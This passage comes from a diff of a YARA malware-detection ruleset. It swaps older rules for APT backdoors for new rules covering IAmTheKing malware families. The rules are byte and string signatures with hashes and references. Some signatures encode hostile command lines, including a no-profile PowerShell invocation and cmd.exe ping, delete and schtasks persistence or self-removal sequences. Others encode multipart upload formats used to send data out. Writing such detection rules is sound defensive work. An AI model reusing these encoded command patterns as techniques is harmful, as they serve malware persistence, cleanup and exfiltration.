+		$s2 = { 50 00 6f 00 77 00 65 00 72 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 2d 00 6e 00 6f 00 70 00 20 00 2d 00 63 00 20 00 25 00 73 }
+		$s3 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e }
+		$s4 = { 5c 00 7e 00 74 00 6d 00 70 00 5f 00 [6-20] ( 00 2e 00 6a 00 70 00 67 | 00 2e 00 70 00 73 00 31) }
+		$s5 = { c7 45 d8 ac 89 41 00 c7 45 dc 00 00 00 00 6a 01 68 00 00 40 04 8d 55 d8 52 68 c8 89 41 00 68 e0 89 41 00 8b 45 c0 83 c0 08 50 68 ec 89 41 00 8b 4d f4 51 ff 15 78 62 41 00 8b 55 c0 89 42 04 8b 45 c0 83 78 04 00 75 19 8b 4d f0 51 ff 15 74 62 41 00 8b 55 f4 52 ff 15 74 62 41 00 e9 14 ff ff ff 68 3c 04 00 00 e8 b7 70 00 00 83 c4 04 89 45 d0 8b 45 d0 89 45 e0 68 ec 01 00 00 e8 a1 70 00 00 83 c4 04 89 45 cc 8b 4d cc 89 4d d4 8b 55 c0 8b 32 b9 7b 00 00 00 8b 7d d4 f3 a5 6a 01 8b 45 c0 83 c0 1c 50 68 ec 01 00 00 8b 4d d4 51 68 c1 f5 09 00 8b 55 c0 83 c2 20 52 e8 04 ef ff ff }
+		$s6 = "http://bot.google.com" fullword ascii
+		$s7 = { 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 00 00 25 00 73 00 00 00 00 00 25 00 73 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 60KB and 4 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 35KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Mailo_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Queenofhearts_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect the Mach-O malware"
+		description = "Detect QueenOfHearts malware"
 		author = "Arkbird_SOLG"
-		id = "4c975200-fce4-5a2a-b565-6d397c4e0b1c"
-		date = "2021-06-09"
-		modified = "2021-06-21"
-		reference = "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-19/MAIL-O/MAL_MailO_Jun_2021_1.yara#L1-L19"
+		id = "763b35dd-6515-5ae8-a539-200a3647f074"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "https://twitter.com/ShadowChasing1/status/1413111641504292864"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_QueenOfHearts_Jul_2021_1.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "165c5fd90039c14ef1fa1e80bb7f14761e991b09560c5f1da2ddf9a0eadee623"
+		logic_hash = "51cb8efddbc635e9a54f58a799e6edcf8eda8ca451ebe85cbce5f6cd20bfb083"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "3a77f108e32b34e184f9ade66292cd73abbd297b4829ba63a973a400cc7f3f9f"
-		hash2 = "603881f4c80e9910ab22f39717e8b296910bff08cd0f25f78d5bff1ae0dce5d7"
+		hash1 = "44eb620879e0c3f80ff95fda5b1e301d471b59e47c4002132df646acfc7cc5ba"
+		hash2 = "a63600e5c28a4c1770a53d310ff017abd3cb9c20cb58a85d53df0c06bcae1864"
+		hash3 = "f110ebee387c2dfac08beb674a8efec20940bc562c5231e9bb4a90296476c29f"
 		tlp = "White"
-		adversary = "TA428"
+		adversary = "IAmTheKing"
 
 	strings:
-		$seq1 = { 48 8b ce e8 9e 0c f9 ff 48 8b 5c 24 20 48 8b 4c 24 28 49 8b d7 41 ff c5 ff 15 20 72 08 00 4c 8b f8 48 85 c0 0f 85 4c ff ff ff 48 8b b4 24 88 00 00 00 48 8b 4c 24 28 33 d2 ff 15 f7 71 08 00 4c 8b ac 24 90 00 00 00 4d 85 e4 0f 84 7f 01 00 00 48 8b ac 24 80 00 00 00 4d 8b c4 48 8b cd 48 8b d6 ff 53 48 49 8b cc 8b f0 e8 88 2c f8 ff 4c 8b bc 24 98 00 00 00 85 c0 0f 8e fb 00 00 00 0f 1f 84 00 00 00 00 00 41 8b d6 49 8b cc e8 95 2e f8 ff 48 8b f8 44 3b f6 75 75 49 89 07 e9 c4 00 00 00 48 8b 5c 24 20 45 33 c0 48 8b ce 41 8d 50 01 e8 a1 4b f9 ff 85 c0 0f 84 43 ff ff ff 49 8b d7 48 8b cb e8 ce e7 ff ff 48 8b d8 48 85 c0 0f 84 2c ff ff ff 49 8b cf ff 15 71 71 08 00 8b 15 ff e0 12 00 4c 8b c3 48 8b ce 48 89 03 e8 45 0c f9 ff 4d 85 e4 75 08 e8 2b 2b f8 ff 4c 8b e0 48 8b d6 49 8b cc e8 cd 2c f8 ff e9 fa fe ff ff 8b 15 ce e0 12 00 48 8b cf e8 ca 0b f9 ff 48 8b d8 48 85 c0 74 39 48 8b 48 10 ff 15 d8 70 08 00 48 8b 4b 08 33 d2 ff 15 d4 70 08 00 48 8b 0b 48 85 c9 74 06 ff 15 0e 71 08 00 41 b8 3a 06 00 00 48 8d 15 b1 71 0d 00 }
-		$seq2 = { 4c 8d 84 24 d0 00 00 00 4c 89 b4 24 90 01 00 00 48 8d 15 d8 a2 17 00 48 8b cd e8 50 e1 ff ff 8b 44 24 40 83 f8 02 74 05 83 f8 17 75 0c 83 7c 24 44 01 75 05 41 b6 01 eb 03 45 32 f6 48 8b 5c 24 28 45 84 f6 74 14 f6 85 74 0e 00 00 08 74 0b 48 8b d3 48 8b ce e8 15 03 00 00 48 8b cb e8 5d f4 ff ff 45 84 f6 74 17 f7 85 74 0e 00 00 00 10 00 00 74 0b 48 8b d3 48 8b cd e8 d1 01 00 00 48 83 bd 38 07 00 00 00 74 33 b2 01 48 8b cd e8 1d f1 fe ff 48 8b 8d 40 07 00 00 45 33 c0 48 8b d3 ff 95 38 07 00 00 33 d2 48 8b cd 44 8b f0 e8 fd f0 fe ff 41 83 fe 02 75 51 41 b4 01 8b 44 24 40 83 f8 02 74 05 83 f8 17 75 5a 48 8d 4c 24 50 e8 ac 81 02 00 44 8b 44 24 40 44 8b c8 48 8b d3 48 8b ce e8 d9 f8 ff ff 8b f8 85 c0 74 37 48 8b d3 48 8b ce e8 68 eb ff ff b8 07 00 00 00 83 ff 01 0f 44 f8 }
-		$seq3 = { 48 8b d0 48 8d 4d 80 41 ff d4 48 8b cb ff 15 f2 fa 1e 00 48 8d 95 e0 00 00 00 48 8d 4d 80 41 ff d7 f6 47 3c 02 48 8d 8d 90 00 00 00 48 0f 44 4c 24 50 e8 f6 04 00 00 4c 8b f0 48 85 c0 0f 84 05 fe ff ff 48 8b 47 28 49 8b d6 4c 8b 0f 4c 8b 47 10 48 85 c0 74 53 48 8d 8d e0 00 00 00 48 89 4c 24 40 48 8d 0d 94 90 15 00 48 89 44 24 38 8b 47 38 89 44 24 30 48 8b 47 08 48 89 44 24 28 48 8b 44 24 58 48 89 44 24 20 e8 e0 42 fc ff 48 8b 4f 28 48 8d 15 b9 8e 15 00 48 8b d8 e8 3d 7a fd ff 85 c0 74 2a ff 47 38 eb 25 48 8d 85 e0 00 00 00 48 89 44 24 28 48 8d 0d a1 90 15 00 48 8b 44 24 58 48 89 44 24 20 e8 a2 42 fc ff 48 8b d8 49 8b ce ff 15 2e fa 1e 00 48 85 db 0f 84 68 fd ff ff 4c 8b 47 20 4d 85 c0 74 27 48 8b d3 48 8d 0d aa 90 15 00 e8 75 42 fc ff 48 8b cb 4c 8b f0 ff 15 01 fa 1e 00 4d 85 f6 0f 84 3b fd ff ff 49 8b de 4c 8b 47 30 4d 85 c0 74 27 48 8b d3 48 8d 0d 8a 90 15 00 e8 45 42 fc ff 48 8b cb 4c 8b f0 ff 15 d1 f9 1e 00 4d 85 f6 0f 84 0b fd ff ff 49 8b de f6 47 3c 02 74 27 48 8b d3 48 8d 0d 75 90 15 00 e8 18 42 fc ff 48 8b cb 48 8b f8 ff 15 a4 f9 1e 00 48 }
-		$seq4 = { 48 81 ec 08 03 00 00 48 8b 05 e2 61 23 00 48 33 c4 48 89 84 24 f0 02 00 00 33 d2 48 8d 8c 24 e0 00 00 00 41 b8 08 02 00 00 e8 c2 f5 16 00 41 b8 04 01 00 00 48 8d 94 24 e0 00 00 00 48 8d 0d c5 94 21 00 ff 15 07 ee 18 00 48 8d 8c 24 e0 00 00 00 ff 15 d1 ef 18 00 85 c0 74 63 33 d2 48 8d 4c 24 70 44 8d 42 68 e8 85 f5 16 00 b8 05 00 00 00 c7 44 24 70 68 00 00 00 66 89 84 24 b0 00 00 00 48 8d 8c 24 e0 00 00 00 48 8d 44 24 50 45 33 c9 48 89 44 24 48 45 33 c0 48 8d 44 24 70 33 d2 48 89 44 24 40 33 c0 48 89 44 24 38 48 89 44 24 30 89 44 24 28 89 44 24 20 ff 15 52 ed 18 00 48 8b 8c 24 f0 02 00 00 48 33 cc e8 c2 cf 16 00 48 }
-		$seq5 = { 48 89 74 24 48 48 8d 0d 99 5e 18 00 4c 89 74 24 50 48 8b d5 4c 89 7c 24 58 e8 5f 13 17 00 4c 8d b7 0c 08 00 00 49 63 06 85 c0 0f 84 b0 00 00 00 48 8b c8 48 c1 e1 03 ff 15 a8 5f 22 00 48 8b f0 48 85 c0 0f 84 04 01 00 00 45 33 ff ba 00 01 00 00 41 8b df 90 48 8b 07 48 85 c0 74 16 4c 39 78 28 74 08 8b cb ff c3 48 89 04 ce 48 8b 00 48 85 c0 75 ea 48 83 c7 08 48 83 ea 01 75 d8 49 63 16 4c 8d 0d ce 01 00 00 41 b8 08 00 00 00 48 8b ce e8 c0 14 17 00 85 db 74 3e 4c 8b f6 49 8b 0e e8 c1 03 00 00 48 8b f8 48 8b cd 48 85 c0 0f 84 85 00 00 00 4c 8b c0 48 8d 15 58 5a 18 00 e8 33 a8 ff ff 48 8b cf ff 15 22 5f 22 00 41 ff c7 49 83 c6 08 44 }
+		$s1 = "send request error:%d" fullword ascii
+		$s2 = "cookie size :%d" fullword wide
+		$s3 = "querycode error" fullword wide
+		$s4 = { 7b 27 73 65 73 73 69 6f 6e 27 3a 5b 7b 27 6e 61 6d 65 27 3a 27 [1-10] 27 2c 27 69 64 27 3a [1-6] 2c 27 74 69 6d 65 27 3a [3-10] 7d 5d 2c 27 6a 70 67 27 3a }
+		$s5 = "PmMytex%d" fullword wide
+		$s6 = { 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2d 00 4c 00 65 00 6e 00 67 00 74 00 68 00 3a 00 20 00 25 00 49 00 36 00 34 00 75 00 0d 00 0a }
+		$s7 = { 25 00 73 00 5c 00 25 00 73 00 2e 00 6c 00 6f 00 67 }
+		$s8 = { 25 00 73 00 5f 00 25 00 63 00 25 00 63 00 25 00 63 00 25 00 63 00 5f 00 25 00 64 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 300KB and 4 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Milan_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_Tool_Screencapture_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect Milian backdoor used by Hexane group (aka Siamesekitten)"
+		description = "Detect Screen Capture utility"
 		author = "Arkbird_SOLG"
-		id = "34acac5a-6090-5a68-9afb-4da7073bed58"
-		date = "2021-08-18"
-		modified = "2021-08-19"
-		reference = "https://www.clearskysec.com/siamesekitten/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-19/Hexane/MAL_Milan_Aug_2021_1.yara#L1-L22"
+		id = "09e4295e-454a-519a-964e-c5295e603aef"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/Tool_ScreenCapture_Jul_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "bad8ae2a9275bcb6e0e903fda6a128a1bed676c8e1a8e653e9fc3467766ce7fc"
+		logic_hash = "dff6c722ec001f5e3b5c53b41f8d457ab69ae46316f5dc7bbf1d00eb3d1ed3c8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		hash1 = "b46949feeda8726c0fb86d3cd32d3f3f53f6d2e6e3fcd6f893a76b8b2632b249"
-		hash2 = "4f1b8c9209fa2684aa3777353222ad1c7716910dbb615d96ffc7882eb81dd248"
+		hash1 = "f441e6239b592ac15538a8ba8903e5874283b066050a5a7e514ce33e84237f4e"
 		tlp = "White"
-		adversary = "Hexane"
+		adversary = "IAmTheKing"
 
 	strings:
-		$c1 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 43 00 20 00 70 00 69 00 6e 00 67 00 20 00 [2-6] 2e 00 [2-6] 2e 00 [2-6] 2e 00 [2-6] 20 00 2d 00 6e 00 20 00 31 00 20 00 2d 00 77 00 20 00 [2-8] 20 00 3e 00 20 00 4e 00 75 00 6c 00 20 00 26 00 20 00 64 00 65 00 6c 00 20 00 2f 00 66 00 20 00 2f 00 71 00 20 00 22 00 25 00 73 00 22 00 20 00 26 00 20 00 77 00 61 00 69 00 74 00 66 00 6f 00 72 00 20 00 61 00 20 00 34 00 20 00 26 00 20 00 63 00 6f 00 70 00 79 00 20 00 22 00 25 00 73 00 22 00 20 00 22 00 25 00 73 00 22 00 20 00 20 00 26 00 20 00 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 52 00 75 00 6e 00 20 00 2f 00 54 00 4e 00 20 00 22 }
-		$c2 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 43 00 20 00 70 00 69 00 6e 00 67 00 20 00 [2-6] 2e 00 [2-6] 2e 00 [2-6] 2e 00 [2-6] 20 00 2d 00 6e 00 20 00 31 00 20 00 2d 00 77 00 20 00 [2-8] 20 00 3e 00 20 00 4e 00 75 00 6c 00 20 00 26 00 20 00 72 00 6d 00 64 00 69 00 72 00 20 00 2f 00 73 00 20 00 2f 00 71 00 20 00 22 00 25 00 73 00 22 00 20 00 26 00 20 00 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 64 00 65 00 6c 00 65 00 74 00 65 00 20 00 2f 00 74 00 6e }
-		$s1 = { 2d 2d 2d 2d 2d 2d [1-8] 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f }
-		$s2 = { 5b 00 25 00 64 00 3a 00 25 00 64 00 3a 00 25 00 64 00 3a 00 25 00 64 00 28 00 25 00 64 00 29 00 5d }
-		$s3 = { 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2d 00 54 00 79 00 70 00 65 00 3a 00 20 00 6d 00 75 00 6c 00 74 00 69 00 70 00 61 00 72 00 74 00 2f 00 66 00 6f 00 72 00 6d 00 2d 00 64 00 61 00 74 00 61 00 3b 00 20 00 62 00 6f 00 75 00 6e 00 64 00 61 00 72 00 79 00 3d 00 2d 00 2d 00 2d 00 2d}
-		$s4 = { 8d 8d 7c ee ff ff 51 6a 00 6a 00 50 ff 15 ?? b2 4b 00 85 c0 0f 84 a9 0f 00 00 8d 85 e0 fb ff ff 50 e8 ?? e0 ff ff 59 50 8d 85 e0 fb ff ff 50 8d 4b 20 e8 [2] 00 00 6a 00 ff b5 94 ee ff ff 8d 85 e0 fb ff ff 50 ff 33 ff 15 ?? b2 4b 00 8b d0 89 95 e8 ee ff ff 85 d2 0f 84 65 0f 00 00 6a 02 5e 33 c9 b8 00 00 80 00 39 b5 88 ee ff ff 0f 44 c8 83 bd 94 ef ff ff 08 51 8d 85 80 ef ff ff 0f 43 85 80 ef ff ff 33 c9 51 51 51 ff b5 a8 ee ff ff 50 52 ff 15 ?? b2 4b 00 8b f0 89 b5 48 ef ff ff 85 f6 0f 84 fb 0e 00 00 80 7b 04 00 8b 3d ?? b2 4b 00 75 23 6a 02 58 39 85 88 ee ff ff 75 18 6a 04 8d 85 20 ef ff ff c7 85 20 ef ff ff 00 31 00 00 50 6a 1f 56 ff d7 c6 85 47 ef ff ff 00 33 c9 c7 85 f0 ee ff ff 18 00 00 00 8b c1 41 89 8d 20 ef ff ff 83 f8 03 0f 83 88 0e 00 00 83 bb d8 00 00 00 00 76 31 8d 83 c8 00 00 00 83 78 14 08 72 02 8b 00 68 00 00 00 01 ff b3 d8 00 00 00 50 56 ff 15 b8 b2 4b 00 85 c0 75 0c ff 15 40 b0 4b 00 89 83 f8 00 00 00 8d b3 a8 00 00 00 83 7e 10 00 76 7a 68 ?? b9 4c 00 8d 8d 98 ef ff ff e8 [2] 00 00 6a ff 33 c0 8d 8d 98 ef ff ff 6a 00 40 56 88 45 fc e8 [2] 00 00 83 bd ac ef ff ff 08 8d 85 98 ef ff ff 8b b5 48 ef ff ff 0f 43 85 98 ef ff ff 68 00 00 00 01 ff b5 a8 ef ff ff 50 56 ff 15 b8 b2 4b 00 85 c0 75 0c ff 15 40 b0 4b 00 89 83 f8 }
-		$s5 = { 6a 00 ff b5 40 ef ff ff ff b3 88 01 00 00 ff 15 30 b0 4b 00 50 57 6a ff 56 8b b5 48 ef ff ff 56 ff 15 ?? b2 4b 00 85 c0 0f 85 b2 02 00 00 8d bd 00 ef ff ff ab ab ab ab 8d 85 00 ef ff ff 50 ff 15 ?? b2 4b 00 85 c0 0f 84 74 02 00 00 8b 95 04 ef ff ff 85 d2 0f 84 4f 01 00 00 33 c0 8d bd b8 ee ff ff 6a 06 59 f3 ab 83 a5 c8 ee ff ff 00 8d bd f4 ee ff ff 83 a5 c4 ee ff ff 00 40 89 85 bc ee ff ff 89 85 cc ee ff ff 33 c0 ab c7 85 b8 ee ff ff 03 00 00 00 89 95 c0 ee ff ff ab ab 8d 43 08 83 }
+		$s1 = "@MyScreen.jpg" fullword wide
+		$s2 = "DISPLAY" fullword wide
+		$s3 = "_invoke_watson" fullword ascii
+		$s4 = "GdipSaveImageToStream" fullword ascii
+		$s5 = { 8b 57 04 89 4d e8 8d 4d e8 51 52 e8 16 0c 00 00 85 c0 74 03 89 47 08 8b 75 e8 81 fe 00 04 00 00 77 18 56 e8 ac f9 ff ff 83 c4 04 84 c0 74 0b 8b c6 e8 9e 15 00 00 8b f4 eb 35 83 c8 ff 2b c6 83 f8 08 72 15 8d 46 08 50 ff 15 f4 30 40 00 83 c4 04 85 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 15KB and 1 of ( $c* ) and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and ( filesize > 8KB and filesize < 60KB ) and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Shark_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Powerpool_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect Shark backdoor used by Hexane group (aka Siamesekitten)"
+		description = "Detect PowerPool malware"
 		author = "Arkbird_SOLG"
-		id = "881dcdd9-2f4d-51d3-b046-15cdb2a2cb55"
-		date = "2021-08-18"
-		modified = "2021-08-19"
-		reference = "https://www.clearskysec.com/siamesekitten/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-19/Hexane/MAL_Shark_Aug_2021_1.yara#L1-L24"
+		id = "8248300e-fc3e-56df-be4a-f1850e2bedc8"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_PowerPool_Jul_2021_1.yara#L1-L29"
 		license_url = "N/A"
-		logic_hash = "c14abb839f4af81a3db38719f23c47498d577a779950e66978ff14d015043490"
+		logic_hash = "0978a6cd60533ffda0c2b13ea98dc1ba46a464890b895cb2704804a763756fca"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		hash1 = "89ab99f5721b691e5513f4192e7c96eb0981ddb6c2d2b94c1a32e2df896397b8"
-		hash2 = "f6ae4f4373510c4e096fab84383b547c8997ccf3673c00660df8a3dc9ed1f3ca"
-		hash3 = "44faf11719b3a679e7a6dd5db40033ec4dd6e1b0361c145b81586cb735a64112"
-		hash4 = "2f2ef9e3f6db2146bd277d3c4e94c002ecaf7deaabafe6195fddabc81a8ee76c"
+		hash1 = "9c08136b26ee5234c61a5d9e5a17afb15da35efc66514d2df5b53178693644c5"
+		hash2 = "23e7e0bbc36d523daa8e3cd8e32618c6c1fb61e32f664756e77d7917b3b11644"
+		hash3 = "e30d32cc40ad19add7dfdcbed960d5f074ea632b796ae975b75eb25455b66bb0"
+		hash4 = "88e7813340194acc4b094fd48ecf665a12d19245b90f2a69dab5861982ca95f6"
 		tlp = "White"
-		adversary = "Hexane"
+		adversary = "IAmTheKing"
 
 	strings:
-		$s1 = { 7b 00 22 00 44 00 61 00 74 00 61 00 22 00 3a 00 5b 00 22 00 00 07 22 00 [0-8] 5d 00 7d }
-		$s2 = "application/json" fullword wide
-		$s3 = { 40 00 45 00 43 00 48 00 4f 00 20 00 4f 00 46 00 46 00 0a 00 00 1d 74 00 61 00 73 00 6b 00 6b 00 69 00 6c 00 6c 00 20 00 2f 00 49 00 4d 00 20 00 22 00 00 17 22 00 20 00 2f 00 46 00 20 00 3e 00 20 00 6e 00 75 00 6c 00 0a 00 00 2b 70 00 69 00 6e 00 67 00 20 00 [12-28] 00 20 00 6e 00 75 00 6c }
-		$s4 = { 2a 00 65 00 78 00 65 00 00 0b 2a 00 70 00 72 00 6f 00 63 00 00 07 2a 00 6b 00 6c 00 00 07 64 00 69 00 72 00 00 11 66 00 69 00 6c 00 65 00 3a 00 2f 00 2f 00 2f }
-		$s5 = { 16 0a 2b 13 02 06 02 06 91 1f 2a 28 ?? 00 00 0a 61 d2 9c 06 17 58 0a 06 02 8e 69 }
-		$s6 = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography" fullword wide
-		$s7 = { 65 00 63 00 68 00 6f 00 20 00 [2-10] 20 00 7c 00 20 00 64 00 65 00 6c 00 20 00 [2-10] 2e 00 62 00 61 00 74 00 00 0f [2-10] 00 2e 00 62 00 61 00 74 }
+		$s1 = "write info fail!!! GetLastError-->%u" fullword ascii
+		$s2 = "Set Option failed errcode: %ld" fullword ascii
+		$s3 = { 68 96 00 00 00 68 ?? c4 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 ?? 4f fe ff 59 c3 68 96 00 00 00 68 ?? c5 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 ?? 4f fe ff 59 c3 68 96 00 00 00 68 [2] 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 [2] fe ff 59 c3 83 3d ?? 4c 45 00 00 74 38 53 6a 01 b8 ?? 4c 45 00 e8 ?? a0 fc ff 50 6a 00 b9 ?? 4c 45 00 e8 [2] fb ff 6a ff bb 01 00 00 00 b8 ?? 4c 45 00 e8 [2] fc ff 40 50 b9 ?? 4c 45 00 e8 [2] fb ff 5b 33 c0 6a ff 50 68 ?? 4c 45 00 }
+		$s4 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 }
+		$s5 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 20 62 6f 75 6e 64 61 72 79 3d 2d 2d 4d 55 4c 54 49 2d 50 41 52 54 53 2d 46 4f 52 4d 2d 44 41 54 41 2d 42 4f 55 4e 44 41 52 59 0d 0a }
+		$s6 = { 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 0d 0a 0d 0a }
+		$s7 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 0d 0a }
+		$s8 = { 25 73 3b 74 79 70 65 3d 25 73 3b 6c 65 6e 67 74 68 3d 25 73 3b 72 65 61 6c 64 61 74 61 3d 25 73 65 6e 64 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 15KB and 6 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Skinnyboy_Dropper_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Jackofhearts_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect SkinnyBoy Dropper"
+		description = "Detect JackOfHearts malware"
 		author = "Arkbird_SOLG"
-		id = "1ea4cfe7-d44d-5cdb-8436-cb2b09dd2e56"
-		date = "2021-05-01"
-		modified = "2021-06-06"
-		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Dropper_Jun_2021_1.yara#L1-L19"
+		id = "42d5eadb-dd94-5a15-8a0d-d1e56b58ce2e"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "hhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_JackOfHearts_Jul_2021_1.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "805bc5bb5833a75d68df2a6ce828d70b2257809a3699fdca5e621aae6bdc5070"
+		logic_hash = "6cad69beb7c104ef19beb26ca42b923283a0303c230e30b48dde58f88af4cd42"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		hash1 = "12331809c3e03d84498f428a37a28cf6cbb1dafe98c36463593ad12898c588c9"
+		hash1 = "64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273"
 		tlp = "White"
-		adversary = "APT28"
+		adversary = "IAmTheKing"
 
 	strings:
-		$s1 = { 55 8b ec b8 48 12 00 00 e8 a3 52 00 00 a1 00 d0 40 00 33 c5 89 45 fc 56 57 68 08 02 00 00 8d 85 cc ed ff ff 50 51 ff 15 2c 80 40 00 6a 00 68 80 00 00 00 6a 03 6a 00 6a 01 68 00 00 00 80 8d 85 cc ed ff ff 50 c7 85 b8 ed ff ff 00 00 00 00 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b f8 83 fe ff 74 12 6a 00 56 ff 15 58 80 40 00 56 8b f8 ff 15 20 80 40 00 8d 85 c8 ed ff ff 50 8d 95 b8 ed ff ff 8d 8d cc ed ff ff 89 bd c8 ed ff ff e8 bc fd ff ff 8b bd b8 ed ff ff b8 4d 5a 00 00 83 c4 04 66 39 07 74 1b 68 c1 00 00 00 ff 15 34 80 40 00 5f 5e 8b 4d fc 33 cd e8 fe 08 00 00 8b e5 }
-		$s2 = { 8b 47 3c 81 3c 07 50 45 00 00 75 d9 8b 47 1c 8b b5 c8 ed ff ff 8b 4f 20 2b f0 85 c9 74 04 8b f1 2b f0 53 56 6a 08 ff 15 0c 80 40 00 50 ff 15 08 80 40 00 8b 4f 1c 56 03 cf 8b d8 51 53 89 9d c4 ed ff ff e8 96 5d 00 00 68 08 02 00 00 8d 85 f4 f9 ff ff 6a 00 50 e8 33 25 00 00 83 c4 18 8d 85 f4 f9 ff ff 50 6a 00 6a 00 68 1c 80 00 00 6a 00 ff 15 30 81 40 00 b8 18 00 00 00 68 ee 00 00 00 66 89 85 0c fc ff ff 8d 85 0e fc ff ff 6a 00 50 c7 85 fc fb ff ff 00 00 3f 00 c7 85 00 fc ff ff 47 00 5b 00 c7 85 04 fc ff ff 09 00 19 00 c7 85 08 fc ff ff 08 00 0d 00 e8 d1 24 00 00 f3 0f 7e 05 c4 bd 40 00 a1 d4 bd 40 00 68 ec 00 00 00 89 85 0c ff ff ff 66 0f d6 85 fc fe ff ff f3 0f 7e 05 cc bd 40 00 8d 85 10 ff ff ff 6a 00 50 66 0f d6 85 04 ff ff ff e8 93 24 00 00 83 c4 18 33 }
